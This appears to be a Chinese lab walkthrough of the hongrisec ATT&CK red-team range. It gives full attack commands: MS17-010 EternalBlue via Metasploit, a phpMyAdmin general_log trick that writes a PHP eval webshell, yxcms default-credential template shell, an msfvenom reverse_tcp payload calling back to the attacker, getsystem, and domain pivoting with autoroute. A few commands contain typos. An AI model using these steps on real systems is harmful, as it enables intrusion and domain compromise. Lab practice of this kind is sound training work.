红队实战靶场ATT&CK(一)
靶机环境设置
-
一共有三台机器,其中win7是外网web主机,winserver08是域控主机,Win2k3是域成员
-
为了能让攻击机器能够与win7靶机通信,需要让它们处于同一个网络环境中,设置win7虚拟机,添加一块网卡,根据自己的虚拟机网卡进行设置,我的虚拟机NAT网卡是VMnet8,这里就给win7靶机添加VMnet8的NAT网卡
-
打开win7虚拟机,开机密码是hongrisec@2019,根据自己的虚拟机网络情况设置网卡ip和网关,让win7靶机和攻击机器处于同一个网段下
-
设置win7靶机防火墙,只开启域防火墙
外网突破
信息收集
-
主机发现
nmap -sn 192.168.2.0/24
-
192.168.2.128是我的虚拟机软路由ip,192.168.2.133是攻击机器ip,那么192.168.2.135就是win7靶机的ip了,扫一下端口
nmap -Pn -sV -sC -p 1-65535 192.168.2.135
-
开放了80端口,发现有445端口和3306端口,疑似有ms17-010永恒之蓝漏洞,待会用fscan扫一下,先访问一下80端口,发现是一个php探针的页面
-
底部有一个mysql检测,试一下弱口令root/root,连接成功
-
dirsearch扫一下目录,发现有phpmyadmin
python3 dirsearch.py -u http://192.168.2.135 -e *
-
御剑扫一下,发现有一个beifen.rar文件
getshell
方法一:ms17-010直接拿system权限
-
fscan扫一下主机漏洞
fscan.exe -h 192.168.2.135
-
发现ms17-010,使用msf扫一下
search ms17_010 use 3 set rhost 192.168.2.135 exploit
-
扫描确认漏洞存在,使用exp进行利用(记得先把攻击机器上的杀软关掉,否则攻击会被拦截)
use windows/smb/ms17_010_eternalblue set 192.168.2.135 expoit
-
利用成功,直接拿下system权限
-
msf拿下shell后出现乱码,输入如下命令即可解决
chcp 65001
方法二:利用phpmyadmin数据库弱口令getshell
-
通过弱口令root/root登录phpmyadmin,在左侧的数据库名中发现一个叫做newyxcms的数据库
-
访问一下发现是一个建站系统cms,后面再看cms有没有漏洞,这里先进行phpMyAdmin的getshell,查询secure_file_priv(secure-file-priv是全局变量,指定文件夹作为导出文件存放的地方,这个值是只读的)是否为null
show variables like '%secure%'
-
查询日志保存状态(ON代表开启 OFF代表关闭)和日志的保存路径
show variables like '%general%'
-
若general_log为OFF,则修改这个值,开启日志保存
set global general_log='on';
-
修改日志保存的路径(general_log_file值)
SET global general_log_file='C:/phpStudy/WWW/2.php'
-
查询是否成功更改
show variables like '%general%'
-
执行SQL语句写入一句话木马
SELECT '<?php @eval($_POST[1]);?>';
-
使用蚁剑连接webshell,拿下权限
方法三:yxcms建站系统getshell
-
先扫描一下yxcms的目录
-
访问/yxcms/public/,发现有目录遍历
-
发现一个csv表格文件,不知道有什么用
-
查看robots.txt文件,发现有一个/protected目录
-
查看/yxcms/protected目录,又是一个目录遍历
-
通过目录遍历找到cms配置文件
-
密文没解出来,在cms首页的公告信息里面发现了默认口令admin/123456,登录地址/index.php?r=admin
-
使用默认口令登入后台
-
yxcms后台有几种getshell的方法,这里只演示通过模板管理写入webshell的方法,点击前台模板—>模板管理—>新增文件,然后写入webshell
-
经过一番查找,找到了webshell文件的地址
-
蚁剑连接shell.php,成功拿下web权限!
权限提升
-
使用msf生成后门程序并上传至目标主机
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.2.133 LPORT=4444 -f exe > shell.exe
-
msf开启监听,webshell中运行后门程序,成功获取反弹shell
use multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.2.133 #攻击机器的ip,要接受反弹shell的ip地址 set lport 4444 run
-
反弹shell成功后使用msf内置命令进行提权,直接获取system权限
getsystem
内网渗透
内网打点
-
查看内网网络信息,发现存在两个不同ip段的网关,存在内网
ipconfig/all
-
查看一下系统补丁信息
systeminfo
-
查看当前登录的域和用户
net config workstation
-
判断主域
net time /domain
-
查看域内主机
net view
-
查看当前域内所有用户
net user /domain
-
查看域控
net group "domain controllers" /domain
-
通过ping命令获取域控IP
ping OWA.god.org
横向移动
-
由于域控主机在另一个网段,攻击机器无法直接与域网段通信,需要在msf中添加一条路由进行转发,执行以下命令
run autoroute -s 192.168.52.0/24
-
利用添加的路由进行内网主机和端口扫描,扫描一下域控主机192.168.52.138的139、445、3389端口,发现开放了139、445端口
background use auxiliary/scanner/portscan/tcp set rhosts 192.168.52.138 set ports 139,445,3389 run
-
扫描一下ms17-010,存在ms17-010漏洞
search ms17_010 use 3 set rhost 192.168.52.138 exploit
-
利用ms17-010进行攻击,域控主机的确存在ms17-010漏洞,但是利用后直接蓝屏了,很是尴尬
use exploit/windows/smb/ms17_010_eternalblue set rhost 192.168.52.138 exploit